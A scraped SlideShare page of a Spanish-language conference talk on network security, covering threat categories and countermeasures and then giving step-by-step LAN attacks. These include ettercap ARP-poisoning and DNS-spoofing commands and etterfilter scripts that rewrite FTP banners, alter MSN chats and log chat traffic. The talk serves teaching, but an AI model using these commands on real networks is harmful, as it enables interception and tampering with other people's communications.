SlideShare una empresa de Scribd logo
1 de 40
III Congreso Boliviano  de Ingeniería y Tecnología Seguridad en redes Ing. Jorge Orellana Araoz Docente Investigador MEMI-UMSS Univ. Gonzalo Nina Auxiliar Centro MEMI-UMSS
Seguridad La seguridad de las redes es una parte integral de las redes informáticas. Incluye protocolos, tecnologías, dispositivos, herramientas y técnicas que aseguran los datos y reducen las amenazas.  La mayor motivación de la seguridad en redes es el esfuerzo por mantenerse un paso más adelante de los hackers malintencionados. Del mismo modo que los médicos intentan prevenir nuevas enfermedades tratando problemas existentes, los profesionales de la seguridad en redes intentan prevenir ataques minimizando los efectos de los ataques en tiempo real.  2
Seguridad
Confidencialidad Integridad Disponibilidad Propiedades de la SeguridadInformatica
Procesamiento Almacenamiento Transmision Estados de la Informacion
Politicas y Procedimientos Tecnologia Educacion, Entrenamiento, y Conocimiento Medidas de Seguridad
Procesamiento Almacenamiento Transmision Confidencialidad Integridad Disponibilidad Politicas y Procedimientos Tecnologia Educacion, Entrenamiento, y Conocimiento Modelo de Seguridad de Informacion
Administracion de Riesgos El proceso de asegurar y cuantificar los riesgos hasta establecer un nivel aceptable de riesgo en la organización. El riego puede ser mitigado, pero nunca eliminado.
Amenazas a la Seguridad 9 Ataques de reconocimiento Descubrimiento y mapeo de sistemas, servicios o vulnerabilidades sin autorización.  Ataques de acceso Explotar vulnerabilidades conocidas en servicios de autenticación, FTP y web para ganar acceso a cuentas web, bases de datos confidenciales y otra información sensible.  Ataques de Denegación de Servicio Envíar un número extremadamente grande de solicitudes en una red o Internet. Estas solicitudes excesivas hacen que la calidad de funcionamiento del dispositivo víctima sea inferior y no estar disponible para acceso y uso legítimo.
Ataques de Reconocimiento 10 ,[object Object]
Barridos de ping
Escaneo de puertos
Búsquedas de información en Internet ,[object Object]
Explotación de la confianza
Redirección de puerto
Ataque Man in theMiddle
Desbordamiento de buffer,[object Object]
Teardrop Attacks
Smurf Attack
DNS Attacks
Email Attacks
Physical Infrastructure Attacks
Viruses/Worms,[object Object]
Etapas de un ataque Hoy en dia los atacantestienengrancantidad de blancos de ataque. Su grandesafioesseleccionarlasvictimasmasvulnerables.  Para estorealizanataquesmuybienplaneados y estructurados.  Estosataquestienenetapaslogisticas y estrategicascomunes: Reconocimiento Exploracion (direcciones, puertos, vulnerabilidades) Ganaracceso MantenerAcceso CubrirPistas
Contramedidas DMZ/NAT IDS/IPS Content Filtering/NAC Firewalls/proxy services Authentication/Authorization/Accounting Self-defending networks Policies, procedures, standards guidelines Training and awareness
Ataques En Redes LAN La seguridad en Redes LAN es muchas veces inexistente y para probarlo se describen los pasos necesarios para realizar algunos ataques en redes de area local.  Escenario Una red de area local (LAN) equipos interconectados mediante dispositivos de networking como ser concentradores (HUBs) o encaminadores (switch). El equipo atacante tiene que estar en la misma red que el equipo victima. 16
Envenenamiento ARP  Lanzar ataque: root@bt#ettercap -T -q -i eth0 -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO Donde: - T : modo Texto - q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante. -  i : Eleccion de la interfaz -  M : Metodoarp 17
Envenenamiento ARP
Envenenamiento ARP
Envenenamiento ARP
Envenenamiento ARP 21
Envenenamiento ARP 22
Envenenamiento ARP 23
Envenenamiento ARP 24
DNS Spoof 1. Editar archivo de conguracion DNS /usr/share/ettercap/etter.dns dominio A direccion-ip 25
DNS Spoof 2. Lanzar el Ataque:  root@bt#ettercap -T -q -i eth0 -P dnsspoof -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO ,[object Object]
 q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante.
i : Eleccion de la interfaz
P : Activa el plugindnsspoof(previa conguracion)-  M : Metodoarp -  P : Activa el plugindnsspoof

Más contenido relacionado

La actualidad más candente

Tipos de Ataques Informaticos
Tipos de Ataques InformaticosTipos de Ataques Informaticos
Tipos de Ataques Informaticos
sm2099
 
Redes Y Seguridad InformáTica
Redes Y Seguridad InformáTicaRedes Y Seguridad InformáTica
Redes Y Seguridad InformáTica
guestb47f49
 
Seguridad y amenazas en la red.
Seguridad y amenazas en la red.Seguridad y amenazas en la red.
Seguridad y amenazas en la red.
guestf3ba8a
 
Seguridad en Redes
Seguridad en RedesSeguridad en Redes
Seguridad en Redes
oligormar
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
mesiefrank
 
Redes Y Seguridad InformáTica
Redes Y Seguridad InformáTicaRedes Y Seguridad InformáTica
Redes Y Seguridad InformáTica
sablaz
 
Las redes y su seguridad
Las redes y su seguridadLas redes y su seguridad
Las redes y su seguridad
DignaMariaBD
 
Ataque a servidores
Ataque a servidoresAtaque a servidores
Ataque a servidores
Jose Ruiz
 

La actualidad más candente (20)

1 categorias-ataques
1 categorias-ataques1 categorias-ataques
1 categorias-ataques
 
Tipos de Ataques Informaticos
Tipos de Ataques InformaticosTipos de Ataques Informaticos
Tipos de Ataques Informaticos
 
Ataque a la red de datos, diapositivas
Ataque a la red de datos, diapositivasAtaque a la red de datos, diapositivas
Ataque a la red de datos, diapositivas
 
Ataques Informáticos
Ataques InformáticosAtaques Informáticos
Ataques Informáticos
 
Virus y ataques informaticos
Virus y ataques informaticosVirus y ataques informaticos
Virus y ataques informaticos
 
Ataques informaticos
Ataques informaticosAtaques informaticos
Ataques informaticos
 
Redes Y Seguridad InformáTica
Redes Y Seguridad InformáTicaRedes Y Seguridad InformáTica
Redes Y Seguridad InformáTica
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redes
 
Seguridad y amenazas en la red.
Seguridad y amenazas en la red.Seguridad y amenazas en la red.
Seguridad y amenazas en la red.
 
Seguridad en Redes
Seguridad en RedesSeguridad en Redes
Seguridad en Redes
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Tipos de ataques informáticos
Tipos de ataques informáticosTipos de ataques informáticos
Tipos de ataques informáticos
 
Trabajo practico de informatica 4
Trabajo practico de informatica 4Trabajo practico de informatica 4
Trabajo practico de informatica 4
 
Presentacion 4 Seguridad En Redes Ip
Presentacion 4 Seguridad En Redes IpPresentacion 4 Seguridad En Redes Ip
Presentacion 4 Seguridad En Redes Ip
 
Acceso No Autorizado A Servicios InformáTicos
Acceso No Autorizado A Servicios InformáTicosAcceso No Autorizado A Servicios InformáTicos
Acceso No Autorizado A Servicios InformáTicos
 
Privacidad en la red Tema 13
Privacidad en la red Tema 13Privacidad en la red Tema 13
Privacidad en la red Tema 13
 
Redes Y Seguridad InformáTica
Redes Y Seguridad InformáTicaRedes Y Seguridad InformáTica
Redes Y Seguridad InformáTica
 
Las redes y su seguridad
Las redes y su seguridadLas redes y su seguridad
Las redes y su seguridad
 
SEGURIDAD EN REDES INFORMÁTICAS
SEGURIDAD EN REDES INFORMÁTICASSEGURIDAD EN REDES INFORMÁTICAS
SEGURIDAD EN REDES INFORMÁTICAS
 
Ataque a servidores
Ataque a servidoresAtaque a servidores
Ataque a servidores
 

Destacado

9.1 security attacks
9.1 security attacks9.1 security attacks
9.1 security attacks
Edwin Vargas
 
Firewall - IPCop
Firewall - IPCopFirewall - IPCop
Firewall - IPCop
FaniMR
 
Fundamentos de seguridad en los sistemas de información aula 2.0
Fundamentos de seguridad en los sistemas de información aula 2.0Fundamentos de seguridad en los sistemas de información aula 2.0
Fundamentos de seguridad en los sistemas de información aula 2.0
Gerardo T. Ortega Carrasquillo
 
Fundamentos Seguridad Informatica Clase 1
Fundamentos Seguridad Informatica Clase 1Fundamentos Seguridad Informatica Clase 1
Fundamentos Seguridad Informatica Clase 1
Marco Antonio
 
Diapositivos ,unidades y perifericos
Diapositivos ,unidades y perifericosDiapositivos ,unidades y perifericos
Diapositivos ,unidades y perifericos
Chenny3
 
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scam
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scamPresentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scam
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scam
José David Mendoza
 
Sample exam information_security_foundation_latin_american_spanish
Sample exam information_security_foundation_latin_american_spanishSample exam information_security_foundation_latin_american_spanish
Sample exam information_security_foundation_latin_american_spanish
edu25
 
Ataques d do s
Ataques d do sAtaques d do s
Ataques d do s
larry_2012
 

Destacado (20)

Los atacantes y sus herramientas
Los atacantes y sus herramientasLos atacantes y sus herramientas
Los atacantes y sus herramientas
 
9.1 security attacks
9.1 security attacks9.1 security attacks
9.1 security attacks
 
Firewall - IPCop
Firewall - IPCopFirewall - IPCop
Firewall - IPCop
 
Fundamentos de seguridad en los sistemas de información aula 2.0
Fundamentos de seguridad en los sistemas de información aula 2.0Fundamentos de seguridad en los sistemas de información aula 2.0
Fundamentos de seguridad en los sistemas de información aula 2.0
 
Ser abogado y CISA.
Ser abogado y CISA.Ser abogado y CISA.
Ser abogado y CISA.
 
Fundamentos Seguridad Informatica Clase 1
Fundamentos Seguridad Informatica Clase 1Fundamentos Seguridad Informatica Clase 1
Fundamentos Seguridad Informatica Clase 1
 
Diapositivos ,unidades y perifericos
Diapositivos ,unidades y perifericosDiapositivos ,unidades y perifericos
Diapositivos ,unidades y perifericos
 
Ups Y Regulador De Voltaje
Ups Y Regulador De VoltajeUps Y Regulador De Voltaje
Ups Y Regulador De Voltaje
 
Seguridad i nseguridad_linux
Seguridad i nseguridad_linuxSeguridad i nseguridad_linux
Seguridad i nseguridad_linux
 
Regulador de corriente
Regulador de corrienteRegulador de corriente
Regulador de corriente
 
Topología de UPS
Topología de UPSTopología de UPS
Topología de UPS
 
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scam
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scamPresentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scam
Presentación pc zombie, phishing, spim, spear phishing, ransomware, spam, scam
 
Firewall hw
Firewall hwFirewall hw
Firewall hw
 
Sample exam information_security_foundation_latin_american_spanish
Sample exam information_security_foundation_latin_american_spanishSample exam information_security_foundation_latin_american_spanish
Sample exam information_security_foundation_latin_american_spanish
 
Presentación Web application firewall
Presentación Web application firewallPresentación Web application firewall
Presentación Web application firewall
 
T3ch fest leganes_final
T3ch fest leganes_finalT3ch fest leganes_final
T3ch fest leganes_final
 
Presentación1
Presentación1Presentación1
Presentación1
 
Ataques d do s
Ataques d do sAtaques d do s
Ataques d do s
 
Cómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDN
Cómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDNCómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDN
Cómo asegurar tu web .es contra ataques, malware, DDoS y ventajas de un CDN
 
Crack Distribuido Atabuido
Crack Distribuido AtabuidoCrack Distribuido Atabuido
Crack Distribuido Atabuido
 

Similar a Seguridad de redes (congreso)

Seguridad Informática
Seguridad InformáticaSeguridad Informática
Seguridad Informática
Josue Mendez
 
Ciberseguridad Cómo identificar con certeza dispositivos comprometidos en la...
Ciberseguridad  Cómo identificar con certeza dispositivos comprometidos en la...Ciberseguridad  Cómo identificar con certeza dispositivos comprometidos en la...
Ciberseguridad Cómo identificar con certeza dispositivos comprometidos en la...
HelpSystems
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
Mini0986
 
Sensibilizacion
SensibilizacionSensibilizacion
Sensibilizacion
predeitor
 
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhh
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhhpresentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhh
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhh
NiltonTenorio
 
Unidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativasUnidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativas
vverdu
 
Guerra contra los_ciberataques_ dirigidos1
Guerra contra los_ciberataques_ dirigidos1Guerra contra los_ciberataques_ dirigidos1
Guerra contra los_ciberataques_ dirigidos1
lulops
 

Similar a Seguridad de redes (congreso) (20)

Seguridad Informática
Seguridad InformáticaSeguridad Informática
Seguridad Informática
 
Ciberseguridad Cómo identificar con certeza dispositivos comprometidos en la...
Ciberseguridad  Cómo identificar con certeza dispositivos comprometidos en la...Ciberseguridad  Cómo identificar con certeza dispositivos comprometidos en la...
Ciberseguridad Cómo identificar con certeza dispositivos comprometidos en la...
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
5to
5to5to
5to
 
Tema 3 ataques
Tema 3 ataquesTema 3 ataques
Tema 3 ataques
 
Tema 3 ataques
Tema 3 ataquesTema 3 ataques
Tema 3 ataques
 
Presentacion_1
Presentacion_1Presentacion_1
Presentacion_1
 
Presentación1
Presentación1Presentación1
Presentación1
 
Presentación1
Presentación1Presentación1
Presentación1
 
seguridad informatica
seguridad informaticaseguridad informatica
seguridad informatica
 
Sensibilizacion
SensibilizacionSensibilizacion
Sensibilizacion
 
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhh
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhhpresentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhh
presentacion.pdfyjjjkjhjjhhkjhjjjkhhjhhhhh
 
Unidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativasUnidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativas
 
Segurida de redes
Segurida de redesSegurida de redes
Segurida de redes
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad en Redes
Seguridad en RedesSeguridad en Redes
Seguridad en Redes
 
Gestion
GestionGestion
Gestion
 
Guerra contra los_ciberataques_ dirigidos1
Guerra contra los_ciberataques_ dirigidos1Guerra contra los_ciberataques_ dirigidos1
Guerra contra los_ciberataques_ dirigidos1
 
Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel Ramirez
Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel RamirezTecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel Ramirez
Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel Ramirez
 
Metodología de Defensa Basada en NIST CSF
Metodología de Defensa Basada en NIST CSFMetodología de Defensa Basada en NIST CSF
Metodología de Defensa Basada en NIST CSF
 

Último

LO QUE NUNCA DEBARIA HABER PASADO PACTO CiU PSC (Roque).pptx
LO QUE NUNCA DEBARIA HABER PASADO PACTO CiU PSC (Roque).pptxLO QUE NUNCA DEBARIA HABER PASADO PACTO CiU PSC (Roque).pptx
LO QUE NUNCA DEBARIA HABER PASADO PACTO CiU PSC (Roque).pptx
roque fernandez navarro
 
Índigo Energía e Industria No. 15 - digitalización en industria farmacéutica
Índigo Energía e Industria No. 15 - digitalización en industria farmacéuticaÍndigo Energía e Industria No. 15 - digitalización en industria farmacéutica
Índigo Energía e Industria No. 15 - digitalización en industria farmacéutica
Indigo Energía e Industria
 

Último (16)

Red de Fraude de Markus Schad Müller en Fondos de Inversión.pdf
Red de Fraude de Markus Schad Müller en Fondos de Inversión.pdfRed de Fraude de Markus Schad Müller en Fondos de Inversión.pdf
Red de Fraude de Markus Schad Müller en Fondos de Inversión.pdf
 
calendario de tandeos macrosectores xalapa mayo 2024.pdf
calendario de tandeos macrosectores xalapa mayo 2024.pdfcalendario de tandeos macrosectores xalapa mayo 2024.pdf
calendario de tandeos macrosectores xalapa mayo 2024.pdf
 
LO QUE NUNCA DEBARIA HABER PASADO PACTO CiU PSC (Roque).pptx
LO QUE NUNCA DEBARIA HABER PASADO PACTO CiU PSC (Roque).pptxLO QUE NUNCA DEBARIA HABER PASADO PACTO CiU PSC (Roque).pptx
LO QUE NUNCA DEBARIA HABER PASADO PACTO CiU PSC (Roque).pptx
 
PRECIOS_M_XIMOS_VIGENTES_DEL_5_AL_11_DE_MAYO_DE_2024.pdf
PRECIOS_M_XIMOS_VIGENTES_DEL_5_AL_11_DE_MAYO_DE_2024.pdfPRECIOS_M_XIMOS_VIGENTES_DEL_5_AL_11_DE_MAYO_DE_2024.pdf
PRECIOS_M_XIMOS_VIGENTES_DEL_5_AL_11_DE_MAYO_DE_2024.pdf
 
LA CRÓNICA COMARCA DE ANTEQUERA _ Nº 1079
LA CRÓNICA COMARCA DE ANTEQUERA _ Nº 1079LA CRÓNICA COMARCA DE ANTEQUERA _ Nº 1079
LA CRÓNICA COMARCA DE ANTEQUERA _ Nº 1079
 
Criminal Internacional Attila Ernö Nemeth y la Autopista del Dinero Sucio .docx
Criminal Internacional Attila Ernö Nemeth y la Autopista del Dinero Sucio .docxCriminal Internacional Attila Ernö Nemeth y la Autopista del Dinero Sucio .docx
Criminal Internacional Attila Ernö Nemeth y la Autopista del Dinero Sucio .docx
 
Informe Estudio de Opinión en Zapopan Jalisco - ABRIL
Informe Estudio de Opinión en Zapopan Jalisco - ABRILInforme Estudio de Opinión en Zapopan Jalisco - ABRIL
Informe Estudio de Opinión en Zapopan Jalisco - ABRIL
 
Boletín semanal informativo 17. Abril 2024
Boletín semanal informativo 17. Abril 2024Boletín semanal informativo 17. Abril 2024
Boletín semanal informativo 17. Abril 2024
 
RELACIÓN DE PLAYAS GALARDONADAS 2024.pdf
RELACIÓN DE PLAYAS GALARDONADAS 2024.pdfRELACIÓN DE PLAYAS GALARDONADAS 2024.pdf
RELACIÓN DE PLAYAS GALARDONADAS 2024.pdf
 
2024-05-02-Carta-145-aniversario-PSOE.pdf
2024-05-02-Carta-145-aniversario-PSOE.pdf2024-05-02-Carta-145-aniversario-PSOE.pdf
2024-05-02-Carta-145-aniversario-PSOE.pdf
 
Novedades Banderas Azules en España para el año 2024
Novedades Banderas Azules en España para el año 2024Novedades Banderas Azules en España para el año 2024
Novedades Banderas Azules en España para el año 2024
 
tandeos xalapa zona_alta_MAYO_2024_VF.pdf
tandeos xalapa zona_alta_MAYO_2024_VF.pdftandeos xalapa zona_alta_MAYO_2024_VF.pdf
tandeos xalapa zona_alta_MAYO_2024_VF.pdf
 
PRESENTACION PLAN ESTRATEGICOS DE SEGURIDAD VIAL - PESV.pdf
PRESENTACION PLAN ESTRATEGICOS DE SEGURIDAD VIAL - PESV.pdfPRESENTACION PLAN ESTRATEGICOS DE SEGURIDAD VIAL - PESV.pdf
PRESENTACION PLAN ESTRATEGICOS DE SEGURIDAD VIAL - PESV.pdf
 
Carta de Sabrina Shorff enviada al juez Kevin Castel
Carta de Sabrina Shorff enviada al juez Kevin CastelCarta de Sabrina Shorff enviada al juez Kevin Castel
Carta de Sabrina Shorff enviada al juez Kevin Castel
 
Índigo Energía e Industria No. 15 - digitalización en industria farmacéutica
Índigo Energía e Industria No. 15 - digitalización en industria farmacéuticaÍndigo Energía e Industria No. 15 - digitalización en industria farmacéutica
Índigo Energía e Industria No. 15 - digitalización en industria farmacéutica
 
Proponen la eliminación del Consejo de la Magistratura
Proponen la eliminación del Consejo de la MagistraturaProponen la eliminación del Consejo de la Magistratura
Proponen la eliminación del Consejo de la Magistratura
 

Seguridad de redes (congreso)

  • 1. III Congreso Boliviano de Ingeniería y Tecnología Seguridad en redes Ing. Jorge Orellana Araoz Docente Investigador MEMI-UMSS Univ. Gonzalo Nina Auxiliar Centro MEMI-UMSS
  • 2. Seguridad La seguridad de las redes es una parte integral de las redes informáticas. Incluye protocolos, tecnologías, dispositivos, herramientas y técnicas que aseguran los datos y reducen las amenazas. La mayor motivación de la seguridad en redes es el esfuerzo por mantenerse un paso más adelante de los hackers malintencionados. Del mismo modo que los médicos intentan prevenir nuevas enfermedades tratando problemas existentes, los profesionales de la seguridad en redes intentan prevenir ataques minimizando los efectos de los ataques en tiempo real. 2
  • 4. Confidencialidad Integridad Disponibilidad Propiedades de la SeguridadInformatica
  • 5. Procesamiento Almacenamiento Transmision Estados de la Informacion
  • 6. Politicas y Procedimientos Tecnologia Educacion, Entrenamiento, y Conocimiento Medidas de Seguridad
  • 7. Procesamiento Almacenamiento Transmision Confidencialidad Integridad Disponibilidad Politicas y Procedimientos Tecnologia Educacion, Entrenamiento, y Conocimiento Modelo de Seguridad de Informacion
  • 8. Administracion de Riesgos El proceso de asegurar y cuantificar los riesgos hasta establecer un nivel aceptable de riesgo en la organización. El riego puede ser mitigado, pero nunca eliminado.
  • 9. Amenazas a la Seguridad 9 Ataques de reconocimiento Descubrimiento y mapeo de sistemas, servicios o vulnerabilidades sin autorización. Ataques de acceso Explotar vulnerabilidades conocidas en servicios de autenticación, FTP y web para ganar acceso a cuentas web, bases de datos confidenciales y otra información sensible. Ataques de Denegación de Servicio Envíar un número extremadamente grande de solicitudes en una red o Internet. Estas solicitudes excesivas hacen que la calidad de funcionamiento del dispositivo víctima sea inferior y no estar disponible para acceso y uso legítimo.
  • 10.
  • 13.
  • 14. Explotación de la confianza
  • 16. Ataque Man in theMiddle
  • 17.
  • 23.
  • 24. Etapas de un ataque Hoy en dia los atacantestienengrancantidad de blancos de ataque. Su grandesafioesseleccionarlasvictimasmasvulnerables. Para estorealizanataquesmuybienplaneados y estructurados. Estosataquestienenetapaslogisticas y estrategicascomunes: Reconocimiento Exploracion (direcciones, puertos, vulnerabilidades) Ganaracceso MantenerAcceso CubrirPistas
  • 25. Contramedidas DMZ/NAT IDS/IPS Content Filtering/NAC Firewalls/proxy services Authentication/Authorization/Accounting Self-defending networks Policies, procedures, standards guidelines Training and awareness
  • 26. Ataques En Redes LAN La seguridad en Redes LAN es muchas veces inexistente y para probarlo se describen los pasos necesarios para realizar algunos ataques en redes de area local. Escenario Una red de area local (LAN) equipos interconectados mediante dispositivos de networking como ser concentradores (HUBs) o encaminadores (switch). El equipo atacante tiene que estar en la misma red que el equipo victima. 16
  • 27. Envenenamiento ARP Lanzar ataque: root@bt#ettercap -T -q -i eth0 -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO Donde: - T : modo Texto - q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante. - i : Eleccion de la interfaz - M : Metodoarp 17
  • 35. DNS Spoof 1. Editar archivo de conguracion DNS /usr/share/ettercap/etter.dns dominio A direccion-ip 25
  • 36.
  • 37. q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante.
  • 38. i : Eleccion de la interfaz
  • 39. P : Activa el plugindnsspoof(previa conguracion)- M : Metodoarp - P : Activa el plugindnsspoof
  • 40.
  • 41.
  • 42.
  • 45. Cambio de datos 1. Crear el filtro de cambio Archivo banner --------------------------------------------- # replace the FTP prompt por SSH if (tcp.src == 21) { replace("FTP","SSH"); } --------------------------------------------- 2. compilar: root@bt#etterfilterbanner -o banner.ef 3. Ejecutar el filtro + envenamiento ARP root@bt#ettercap -T -q -i eth0 -F banner.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO 32
  • 46.
  • 47. Alteracion de Conversaciones (Caso MSN Messenger) 1. Crear el filtro de cambio Archivo msn ------------------------------------------------- 34
  • 48. Alteracion de Conversaciones(Caso MSN Messenger) 2. compilar: root@bt#etterfiltermsn -o msn.ef 3. Ejecutar el filtro + envenamiento ARP root@bt#ettercap -T -q -i eth0 -F msn.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO 35
  • 49.
  • 50. Grabar Chat 1. Crear el filtro de guardar conversaciones Archivo ver chat -------------------------------------------------- if (tcp.src == 1863 || tcp.dst == 1863) { log(DATA.data, "/tmp/msn.log"); msg("Texto plano MSN Guardado!XD"); } -------------------------------------------------- 37
  • 51. Grabar Chat 2. compilar: root@bt#etterfilterverchar -o verchat.ef 3. Ejecutar el filtro + envenamiento ARP root@bt#ettercap -T -q -i eth0 -F verchat.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO 4. Revisar el archivo /tmp/msn.log 38